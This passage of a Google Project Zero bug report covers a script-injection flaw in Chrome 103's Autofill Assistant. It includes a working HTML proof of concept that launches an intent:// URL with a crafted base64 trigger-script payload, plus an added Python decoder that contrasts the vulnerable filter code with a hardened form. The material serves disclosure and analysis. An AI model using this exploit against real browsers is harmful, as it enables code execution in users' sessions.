https://source.chromium.org/chromium/chromium/src/+/main:components/autofill_assistant/browser/web/js_filter_builder.cc;drc=9e3fd1a0c143cf14101c1abcb4c98345bcaf9890;l=197<br />[7] https://source.chromium.org/chromium/chromium/src/+/main:components/autofill_assistant/browser/web/js_filter_builder.cc;drc=9e3fd1a0c143cf14101c1abcb4c98345bcaf9890;l=189<br /><br />VERSION<br />Google Chrome 103.0.5060.53 (Official Build)<br /><br />REPRODUCTION CASE<br />```<br /><body><br /><h1>Click me</h1><br /><script><br />NS = ".org.chromium.chrome.browser.autofill_assistant.";<br />TARGET_URL = "https://google.com/";<br /><br />onclick = () => {<br />  w = open("https://google.com/");<br />  setTimeout(() => {<br />    w.location = `intent://a/#Intent;<br />      scheme=http;<br />      S.browser_fallback_url=${escape(TARGET_URL)};<br />      B${NS}ENABLED=true;<br />      B${NS}START_IMMEDIATELY=false;<br />      S${NS}TRIGGER_SCRIPTS_BASE64=CiQKIkIgSgMSASpKGXIXChFhK2FsZXJ0KGxvY2F0aW9uKRICCgA=;<br />      end`.replace(/\s/g, "");<br />  }, 1000);<br />}<br /></script><br /></body><br /><br />```<br /><br />CREDIT INFORMATION<br />Sergei Glazunov of Google Project Zero<br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2022-09-22.<br /><br />Please note that, according to our disclosure policy, if Project Zero discovers a variant of a previously reported Project Zero bug, technical details of the variant will be added to the existing Project Zero report (which may be already public) and the report will not receive a new deadline. For more details, see https://googleprojectzero.blogspot.com/2021/04/policy-and-disclosure-2021-edition.html.<br /><br />Found by: glazunov@google.com<br /></code></pre>
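The TRIGGER_SCRIPTS_BASE64 value in the reproduction case is a serialized protobuf message, and sections 3 and 4 of the report turn on one string inside it. The Python below is an added example, not Chromium's or Project Zero's code: a hand-written wire-format walker (no protobuf dependency) pulls the attacker-controlled property name back out of the blob using only the PropertyFilter field numbers the report quotes (property = 1, text_filter = 2); the field numbers of the enclosing messages are read from the bytes, not from any schema, and are only assumed to line up with trigger_scripts / trigger_condition / selector / filters / property in the textproto above. The script then regenerates the filter line the way the report describes AddRegexpFilter building it, next to an assumed hardened form that passes the name as a JSON string literal and indexes e[...] with it. That hardened form is one possible fix, not the one Chromium shipped.

```python
"""Decode the TRIGGER_SCRIPTS_BASE64 blob from the PoC and re-create the
JsFilterBuilder filter line for it (added example, not Chromium code).

Assumptions: only the PropertyFilter field numbers (1 = property,
2 = text_filter) come from the report; the hardened generator is an
assumed fix.
"""
import base64
import json

TRIGGER_SCRIPTS_B64 = "CiQKIkIgSgMSASpKGXIXChFhK2FsZXJ0KGxvY2F0aW9uKRICCgA="


def read_varint(buf, i):
    """Protobuf base-128 varint starting at buf[i]; returns (value, next index)."""
    value, shift = 0, 0
    while True:
        byte = buf[i]
        i += 1
        value |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return value, i
        shift += 7


def decode_message(buf):
    """Split one message into [(field_number, payload)].  Varint payloads come
    back as int, length-delimited ones as bytes; other wire types are refused
    rather than guessed (the PoC blob contains none)."""
    fields, i = [], 0
    while i < len(buf):
        tag, i = read_varint(buf, i)
        number, wire_type = tag >> 3, tag & 0x07
        if wire_type == 0:
            value, i = read_varint(buf, i)
        elif wire_type == 2:
            length, i = read_varint(buf, i)
            if i + length > len(buf):
                raise ValueError("length-delimited field runs past the end")
            value, i = buf[i:i + length], i + length
        else:
            raise ValueError("unsupported wire type %d" % wire_type)
        fields.append((number, value))
    return fields


def find_property_filters(buf, path=()):
    """Walk every length-delimited field recursively and return
    [(path_of_field_numbers, property_name)] for each sub-message with the
    PropertyFilter shape from the report: field 1 a string, then field 2."""
    try:
        fields = decode_message(buf)
    except (ValueError, IndexError):
        return []  # a plain string or scalar, not a nested message
    hits = []
    if [n for n, _ in fields] == [1, 2] and isinstance(fields[0][1], bytes):
        hits.append((path, fields[0][1].decode("utf-8", "replace")))
    for number, value in fields:
        if isinstance(value, bytes):
            hits.extend(find_property_filters(value, path + (number,)))
    return hits


def decode_trigger_scripts(b64):
    """Decode the intent parameter and list the property names it carries."""
    return find_property_filters(base64.b64decode(b64))


def filter_line_vulnerable(re_var, prop):
    # What the report says AddRegexpFilter does: the name is pasted into code.
    return "elements = elements.filter((e) => %s.test(e.%s));" % (re_var, prop)


def filter_line_hardened(re_var, prop):
    # Assumed fix: the name becomes a JS string literal used to index the
    # element, so it can only ever name a property, never extend the code.
    return "elements = elements.filter((e) => %s.test(e[%s]));" % (re_var, json.dumps(prop))


if __name__ == "__main__":
    for path, name in decode_trigger_scripts(TRIGGER_SCRIPTS_B64):
        print("PropertyFilter at field path", path, "property =", repr(name))
        print("  vulnerable:", filter_line_vulnerable("v1", name))
        print("  hardened:  ", filter_line_hardened("v1", name))
```

Running it prints the property name a+alert(location) at field path (1, 1, 8, 9, 14), the nesting depth of the textproto in the report, and the two generated lines differ only in how that name is spliced in; the report's own rendering of the vulnerable line is the same expression with spaces around the +.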